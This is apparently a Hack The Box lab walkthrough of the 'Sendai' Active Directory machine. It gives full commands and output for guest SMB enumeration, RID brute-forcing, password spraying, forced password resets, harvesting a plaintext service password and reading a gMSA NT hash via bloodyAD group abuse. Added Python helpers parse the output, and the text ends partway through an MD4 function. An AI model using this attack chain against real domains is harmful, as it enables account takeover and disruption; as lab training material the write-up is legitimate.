Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ nmap -sC -sV -Pn 10.129.234.66 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-02 08:40 UTC
Nmap scan report for 10.129.234.66
Host is up (0.33s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-02 08:41:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2025-08-18T12:30:05
|_Not valid after: 2026-08-18T12:30:05
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Not valid before: 2023-07-18T12:39:21
|_Not valid after: 2024-07-18T00:00:00
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2025-08-18T12:30:05
|_Not valid after: 2026-08-18T12:30:05
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2025-08-18T12:30:05
|_Not valid after: 2026-08-18T12:30:05
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2025-08-18T12:30:05
|_Not valid after: 2026-08-18T12:30:05
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Not valid before: 2025-04-15T02:26:14
|_Not valid after: 2025-10-15T02:26:14
| rdp-ntlm-info:
| Target_Name: SENDAI
| NetBIOS_Domain_Name: SENDAI
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sendai.vl
| DNS_Computer_Name: dc.sendai.vl
| DNS_Tree_Name: sendai.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-09-02T08:42:31+00:00
|_ssl-date: 2025-09-02T08:43:12+00:00; +1m10s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 1m09s, deviation: 0s, median: 1m09s
| smb2-time:
| date: 2025-09-02T08:42:33
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.78 seconds
The domain is sendai.vl and the DC is dc.sendai.vl (from the LDAP and RDP info), so let's add both names to /etc/hosts.
SMB - TCP 445
First, let's check the SMB service on the DC
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb dc.sendai.vl
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False) (Guest Auth:True)
The banner reports Guest Auth:True, so the Guest account is enabled; let's use it to enumerate the shares
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb dc.sendai.vl -u guest -p ''
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\guest:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb dc.sendai.vl -u guest -p '' --shares
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\guest:
SMB 10.129.247.57 445 DC [*] Enumerated shares
SMB 10.129.247.57 445 DC Share Permissions Remark
SMB 10.129.247.57 445 DC ----- ----------- ------
SMB 10.129.247.57 445 DC ADMIN$ Remote Admin
SMB 10.129.247.57 445 DC C$ Default share
SMB 10.129.247.57 445 DC config
SMB 10.129.247.57 445 DC IPC$ READ Remote IPC
SMB 10.129.247.57 445 DC NETLOGON Logon server share
SMB 10.129.247.57 445 DC sendai READ company share
SMB 10.129.247.57 445 DC SYSVOL Logon server share
SMB 10.129.247.57 445 DC Users READ
Guest can read the Users and sendai shares (plus IPC$), so those are our targets
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ smbclient //dc.sendai.vl/Users -N
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Tue Jul 11 09:58:27 2023
.. DHS 0 Wed Apr 16 02:55:42 2025
Default DHR 0 Tue Jul 11 16:36:32 2023
desktop.ini AHS 174 Sat May 8 08:18:31 2021
Public DR 0 Tue Jul 11 07:36:58 2023
7019007 blocks of size 4096. 860730 blocks available
There is nothing interesting in the Users share, so let's continue with the sendai share
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ smbclient //dc.sendai.vl/sendai -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 18 17:31:04 2023
.. DHS 0 Wed Apr 16 02:55:42 2025
hr D 0 Tue Jul 11 12:58:19 2023
incident.txt A 1372 Tue Jul 18 17:34:15 2023
it D 0 Tue Jul 18 13:16:46 2023
legal D 0 Tue Jul 11 12:58:23 2023
security D 0 Tue Jul 18 13:17:35 2023
transfer D 0 Tue Jul 11 13:00:20 2023
7019007 blocks of size 4096. 854691 blocks available
smb: \> get incident.txt
Now we can check this file
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ cat incident.txt
Dear valued employees,
We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.
To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.
We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.
If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.
Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.
So a significant number of accounts had weak passwords, and IT "expired" them, i.e. set them to change their password at next logon. An account in that state still accepts its current password; it just cannot log on until the password is changed.
First we need usernames. The Guest session lets us brute-force RIDs over SAMR to get the full list
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb dc.sendai.vl -u guest -p '' --rid-brute
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\guest:
SMB 10.129.247.57 445 DC 498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.247.57 445 DC 500: SENDAI\Administrator (SidTypeUser)
SMB 10.129.247.57 445 DC 501: SENDAI\Guest (SidTypeUser)
SMB 10.129.247.57 445 DC 502: SENDAI\krbtgt (SidTypeUser)
SMB 10.129.247.57 445 DC 512: SENDAI\Domain Admins (SidTypeGroup)
SMB 10.129.247.57 445 DC 513: SENDAI\Domain Users (SidTypeGroup)
SMB 10.129.247.57 445 DC 514: SENDAI\Domain Guests (SidTypeGroup)
SMB 10.129.247.57 445 DC 515: SENDAI\Domain Computers (SidTypeGroup)
SMB 10.129.247.57 445 DC 516: SENDAI\Domain Controllers (SidTypeGroup)
SMB 10.129.247.57 445 DC 517: SENDAI\Cert Publishers (SidTypeAlias)
SMB 10.129.247.57 445 DC 518: SENDAI\Schema Admins (SidTypeGroup)
SMB 10.129.247.57 445 DC 519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB 10.129.247.57 445 DC 520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.247.57 445 DC 521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.247.57 445 DC 522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.247.57 445 DC 525: SENDAI\Protected Users (SidTypeGroup)
SMB 10.129.247.57 445 DC 526: SENDAI\Key Admins (SidTypeGroup)
SMB 10.129.247.57 445 DC 527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.247.57 445 DC 553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.247.57 445 DC 571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.247.57 445 DC 572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.247.57 445 DC 1000: SENDAI\DC$ (SidTypeUser)
SMB 10.129.247.57 445 DC 1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB 10.129.247.57 445 DC 1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.247.57 445 DC 1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB 10.129.247.57 445 DC 1104: SENDAI\sqlsvc (SidTypeUser)
SMB 10.129.247.57 445 DC 1105: SENDAI\websvc (SidTypeUser)
SMB 10.129.247.57 445 DC 1107: SENDAI\staff (SidTypeGroup)
SMB 10.129.247.57 445 DC 1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB 10.129.247.57 445 DC 1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB 10.129.247.57 445 DC 1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB 10.129.247.57 445 DC 1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB 10.129.247.57 445 DC 1112: SENDAI\Susan.Harper (SidTypeUser)
SMB 10.129.247.57 445 DC 1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB 10.129.247.57 445 DC 1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB 10.129.247.57 445 DC 1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB 10.129.247.57 445 DC 1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB 10.129.247.57 445 DC 1117: SENDAI\Jason.Brady (SidTypeUser)
SMB 10.129.247.57 445 DC 1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB 10.129.247.57 445 DC 1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB 10.129.247.57 445 DC 1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB 10.129.247.57 445 DC 1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB 10.129.247.57 445 DC 1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB 10.129.247.57 445 DC 1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB 10.129.247.57 445 DC 1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB 10.129.247.57 445 DC 1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB 10.129.247.57 445 DC 1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB 10.129.247.57 445 DC 1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB 10.129.247.57 445 DC 1128: SENDAI\ca-operators (SidTypeGroup)
SMB 10.129.247.57 445 DC 1129: SENDAI\admsvc (SidTypeGroup)
SMB 10.129.247.57 445 DC 1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB 10.129.247.57 445 DC 1131: SENDAI\support (SidTypeGroup)
We can save just the user accounts (SidTypeUser) to a file
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb dc.sendai.vl -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | cut -d' ' -f1 > users.txt
Then let's spray the empty password against every user. The NTSTATUS codes are what matter here: STATUS_LOGON_FAILURE means the password was wrong, whereas STATUS_PASSWORD_MUST_CHANGE (or STATUS_PASSWORD_EXPIRED) is only returned after the DC has accepted the password, so it reveals accounts whose current password really is blank. Check the lockout policy first (netexec smb ... --pass-pol) before spraying more than a single candidate password.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u users.txt -p '' --continue-on-success
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [+] sendai.vl\Guest:
SMB 10.129.247.57 445 DC [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\DC$: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\websvc: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
SMB 10.129.247.57 445 DC [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE
SMB 10.129.247.57 445 DC [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE
SMB 10.129.247.57 445 DC [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE
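The two parsing steps above (turning --rid-brute output into a user list, then reading the spray results by status code) are worth automating, because the interesting result is not the [+] line but the STATUS_PASSWORD_MUST_CHANGE ones. The Python below is an added example, not part of the original write-up or of netexec; the sample lines are constructed to look like the netexec output on this page, and the Test.Locked / Test.Disabled accounts and their statuses are invented to exercise every bucket.

```python
"""Post-process netexec output: build a user list from --rid-brute and bucket a
password spray by NTSTATUS code. Added example, not part of the original write-up."""
import re

# Constructed sample output, shaped like the netexec lines earlier on this page.
# The Test.* accounts and their statuses are invented to exercise every bucket.
RID_BRUTE_SAMPLE = r"""
SMB  10.129.247.57  445  DC  500: SENDAI\Administrator (SidTypeUser)
SMB  10.129.247.57  445  DC  513: SENDAI\Domain Users (SidTypeGroup)
SMB  10.129.247.57  445  DC  1000: SENDAI\DC$ (SidTypeUser)
SMB  10.129.247.57  445  DC  1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB  10.129.247.57  445  DC  1130: SENDAI\mgtsvc$ (SidTypeUser)
""".strip().splitlines()

SPRAY_SAMPLE = r"""
SMB  10.129.247.57  445  DC  [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE
SMB  10.129.247.57  445  DC  [+] sendai.vl\Guest:
SMB  10.129.247.57  445  DC  [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
SMB  10.129.247.57  445  DC  [-] sendai.vl\Test.Locked: STATUS_ACCOUNT_LOCKED_OUT
SMB  10.129.247.57  445  DC  [-] sendai.vl\Test.Disabled: STATUS_ACCOUNT_DISABLED
SMB  10.129.247.57  445  DC  [+] sendai.vl\sqlsvc:SurenessBlob85
""".strip().splitlines()

RID_RE = re.compile(r"(?P<rid>\d+): [^\\]+\\(?P<name>.+?) \((?P<kind>SidType\w+)\)")
SPRAY_RE = re.compile(r"\[(?P<mark>[+-])\] [^\\]+\\(?P<user>[^:]+):(?P<rest>.*)$")

# Password accepted, but the account must change it before it can log on:
# reset it over SAMR (impacket-changepasswd) using the sprayed password as "current".
MUST_CHANGE = {"STATUS_PASSWORD_MUST_CHANGE", "STATUS_PASSWORD_EXPIRED"}
# Codes the DC returns only after the password itself was accepted; the account is
# merely blocked from this kind of logon. Spraying tools count these as hits.
ACCEPTED_BUT_BLOCKED = {
    "STATUS_ACCOUNT_DISABLED", "STATUS_ACCOUNT_RESTRICTION",
    "STATUS_LOGON_TYPE_NOT_GRANTED", "STATUS_INVALID_LOGON_HOURS",
    "STATUS_INVALID_WORKSTATION",
}


def users_from_rid_brute(lines, include_machine=False):
    """Usernames (SidTypeUser only) in RID order; machine accounts ($) are dropped by default."""
    users = []
    for line in lines:
        m = RID_RE.search(line)
        if not m or m["kind"] != "SidTypeUser":
            continue
        if m["name"].endswith("$") and not include_machine:
            continue
        users.append(m["name"])
    return users


def classify_spray(lines):
    """Bucket spray results: 'valid' holds (user, password); the other buckets hold user names."""
    buckets = {"valid": [], "must_change": [], "accepted_but_blocked": [],
               "locked_out": [], "failed": []}
    for line in lines:
        m = SPRAY_RE.search(line)
        if not m:
            continue
        user = m["user"]
        rest = m["rest"].replace("(Pwn3d!)", "").strip()   # netexec appends (Pwn3d!) for local admins
        if m["mark"] == "+":
            buckets["valid"].append((user, rest))            # rest is the password that worked
        elif rest in MUST_CHANGE:
            buckets["must_change"].append(user)
        elif rest == "STATUS_ACCOUNT_LOCKED_OUT":
            buckets["locked_out"].append(user)               # stop spraying: the lockout threshold was hit
        elif rest in ACCEPTED_BUT_BLOCKED:
            buckets["accepted_but_blocked"].append(user)
        else:
            buckets["failed"].append(user)
    return buckets


if __name__ == "__main__":
    print("\n".join(users_from_rid_brute(RID_BRUTE_SAMPLE)))
    for bucket, entries in classify_spray(SPRAY_SAMPLE).items():
        print(f"{bucket:22s} {entries}")
```

Pipe the real netexec output into the two functions instead of the samples; a non-empty locked_out bucket is the signal to stop and re-read the lockout policy rather than to try the next password.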
Thomas.Powell and Elliot.Yates accept the empty password but must change it before they can log on, so they are the next targets. impacket-changepasswd does the change over SAMR: we give the blank current password and choose a new one (the tool falls back to a null-session bind because the expired account itself cannot authenticate). Keep in mind that changing a user's password is a visible, disruptive action on a real engagement; note it for the report.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ impacket-changepasswd sendai.vl/Elliot.Yates:''@sendai.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Current password:
New password:
Retype new password:
[*] Changing the password of sendai.vl\Elliot.Yates
[*] Connecting to DCE/RPC as sendai.vl\Elliot.Yates
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ impacket-changepasswd sendai.vl/Thomas.Powell:''@sendai.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Current password:
New password:
Retype new password:
[*] Changing the password of sendai.vl\Thomas.Powell
[*] Connecting to DCE/RPC as sendai.vl\Thomas.Powell
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Now let's verify the new credentials (the new password chosen for both accounts was wither123.)
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u Thomas.Powell -p 'wither123.'
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\Thomas.Powell:wither123.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec winrm DC.sendai.vl -u Thomas.Powell -p 'wither123.'
WINRM 10.129.247.57 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM 10.129.247.57 5985 DC [-] sendai.vl\Thomas.Powell:wither123.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u Elliot.Yates -p 'wither123.'
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\Elliot.Yates:wither123.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec winrm DC.sendai.vl -u Elliot.Yates -p 'wither123.'
WINRM 10.129.247.57 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM 10.129.247.57 5985 DC [-] sendai.vl\Elliot.Yates:wither123.
WinRM is refused for both users, so we can't get a shell that way yet; let's continue enumerating SMB with the new credentials
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u Thomas.Powell -p 'wither123.' --shares
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\Thomas.Powell:wither123.
SMB 10.129.247.57 445 DC [*] Enumerated shares
SMB 10.129.247.57 445 DC Share Permissions Remark
SMB 10.129.247.57 445 DC ----- ----------- ------
SMB 10.129.247.57 445 DC ADMIN$ Remote Admin
SMB 10.129.247.57 445 DC C$ Default share
SMB 10.129.247.57 445 DC config READ,WRITE
SMB 10.129.247.57 445 DC IPC$ READ Remote IPC
SMB 10.129.247.57 445 DC NETLOGON READ Logon server share
SMB 10.129.247.57 445 DC sendai READ,WRITE company share
SMB 10.129.247.57 445 DC SYSVOL READ Logon server share
SMB 10.129.247.57 445 DC Users READ
The config share, which Guest could not read, is now readable (and writable) for us
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ smbclient '//DC.sendai.vl/config' -U 'thomas.powell%wither123.'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 24 05:19:42 2025
.. DHS 0 Wed Apr 16 02:55:42 2025
.sqlconfig A 78 Tue Jul 11 12:57:11 2023
7019007 blocks of size 4096. 1195715 blocks available
smb: \> get .sqlconfig
Now we can check it
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;
This is an MSSQL connection string with the sqlsvc domain account. Let's verify the credentials
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u sqlsvc -p SurenessBlob85
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\sqlsvc:SurenessBlob85
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec winrm DC.sendai.vl -u sqlsvc -p SurenessBlob85
WINRM 10.129.247.57 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM 10.129.247.57 5985 DC [-] sendai.vl\sqlsvc:SurenessBlob85
Port 1433 was not among the open ports in the nmap scan, so we cannot reach the MSSQL instance from our host, and sqlsvc can't WinRM either; these credentials don't give us a shell yet.
Bloodhound by thomas.powell
I'll collect BloodHound data with netexec's LDAP collector
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec ldap DC.sendai.vl -u Thomas.Powell -p wither123. --bloodhound --dns-server 10.129.247.57 -c All
LDAP 10.129.247.57 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
LDAP 10.129.247.57 389 DC [+] sendai.vl\Thomas.Powell:wither123.
LDAP 10.129.247.57 389 DC Resolved collection methods: psremote, group, session, trusts, acl, dcom, rdp, objectprops, localadmin, container
From the analysis, both Thomas.Powell and Elliot.Yates have interesting outbound control ![[Pasted image 20251024162050.png]]
Both users are members of the Support group, which has GenericAll over the AdmSvc group. AdmSvc in turn has ReadGMSAPassword over the gMSA MGTSVC$, and MGTSVC$ is a member of Remote Management Users, so it can log on over WinRM. The path is: add ourselves to AdmSvc, read the gMSA's managed password, and pass the hash over WinRM.
Since Support already has GenericAll over AdmSvc, use bloodyAD to add Thomas.Powell to the group. The first command below, which grants Thomas.Powell an explicit GenericAll ACE on AdmSvc, is redundant given the Support membership but harmless; the second one does the work:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ bloodyAD -u Thomas.Powell -p 'wither123.' -d sendai.vl --dc-ip 10.129.247.57 add genericAll admsvc Thomas.Powell
[+] Thomas.Powell has now GenericAll on admsvc
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ bloodyAD -u Thomas.Powell -p 'wither123.' -d sendai.vl --dc-ip 10.129.247.57 add groupMember admsvc Thomas.Powell
[+] Thomas.Powell added to admsvc
Then read the gMSA password. ReadGMSAPassword is read access to the msDS-ManagedPassword attribute, which the DC only returns over an encrypted connection (hence netexec switching to LDAPS below); netexec derives the NT hash from the returned blob
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec ldap DC.sendai.vl -u Thomas.Powell -p wither123. --gmsa
LDAP 10.129.247.57 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
LDAPS 10.129.247.57 636 DC [+] sendai.vl\Thomas.Powell:wither123.
LDAPS 10.129.247.57 636 DC [*] Getting GMSA Passwords
LDAPS 10.129.247.57 636 DC Account: mgtsvc$ NTLM: eb19b37b20218824d3c29f753fd5f607 PrincipalsAllowedToReadPassword: admsvc
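What netexec did with that attribute is worth seeing once: msDS-ManagedPassword is an MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19), and the NT hash is simply MD4 over the current password's UTF-16LE bytes, exactly as for any other account. The Python below is an added example of that parsing, not netexec's or impacket's code. The sample blob is constructed in the file with the UTF-16LE form of "password" as the managed password, so the result is the familiar NT hash of "password"; MD4 is implemented inline because hashlib's md4 is frequently disabled under OpenSSL 3.

```python
"""Parse an msDS-ManagedPassword value (MSDS-MANAGEDPASSWORD_BLOB, MS-ADTS 2.2.19) and
derive the NT hash from it, which is what netexec --gmsa printed above. Added example,
not netexec's or impacket's code; the sample blob is constructed in this file."""
import struct

MASK32 = 0xFFFFFFFF
HEADER = "<HHIHHHH"   # Version, Reserved, Length, CurrentPasswordOffset, PreviousPasswordOffset,
                      # QueryPasswordIntervalOffset, UnchangedPasswordIntervalOffset


def _rotl(x, n):
    x &= MASK32
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data):
    """MD4 (RFC 1320) in pure Python: hashlib's md4 is often unavailable under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
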